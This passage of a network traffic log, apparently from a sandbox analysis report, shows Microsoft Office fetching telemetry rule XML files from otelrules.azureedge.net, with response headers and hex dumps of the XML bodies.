2024-11-30 11:48:42 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49850	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:42 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:42 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: 8d8a3cd7-301e-001f-2922-41aa3a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114842Z-174f7845968psccphC1EWRuz9s00000011mg000000006hbq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:42 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49852	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:44 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:44 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:44 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 2ff5ce10-101e-0017-5791-3f47c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114844Z-174f78459685726chC1EWRsnbg00000011f0000000004abv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:44 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49854	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:44 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:44 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:44 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 5a810e9b-b01e-003d-75b4-42d32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114844Z-174f7845968pght8hC1EWRyvxg00000004d000000000an43 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:44 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49855	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:44 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:44 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:44 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 580008bf-301e-0000-1d8a-3feecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114844Z-174f7845968ljs8phC1EWRe6en000000119g000000002deq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:44 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	49853	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:44 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:44 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:44 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 13f42ca4-401e-000a-561c-414a7b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114844Z-174f7845968qj8jrhC1EWRh41s000000119g00000000764b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:44 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49856	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:44 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:45 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:44 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: ce4b1eeb-d01e-007a-68af-42f38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114844Z-174f784596886s2bhC1EWR743w00000011cg000000006wcy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:45 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49857	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:46 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:47 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:46 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 6e1934d2-a01e-006f-595c-3f13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114846Z-174f7845968cdxdrhC1EWRg0en00000011cg0000000037e3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:47 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49858	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:46 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:47 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:46 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: a0e0d5c5-a01e-0084-68de-419ccd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114846Z-174f7845968vqt9xhC1EWRgten00000011bg000000008v7m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:47 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	49859	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:46 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:47 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:47 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: 417f12c6-b01e-003e-571e-428e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114847Z-174f7845968nxc96hC1EWRspw8000000111g00000000933v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:47 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49860	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:46 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:47 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:47 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: e52eaca9-401e-0064-32a1-4254af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114847Z-174f78459685726chC1EWRsnbg00000011bg0000000098f9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:47 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	49861	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:46 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:47 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:47 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 70a2a6ee-001e-00a2-299e-42d4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114847Z-174f7845968n2hr8hC1EWR9cag00000010x000000000as78 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:47 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49862	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:48 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
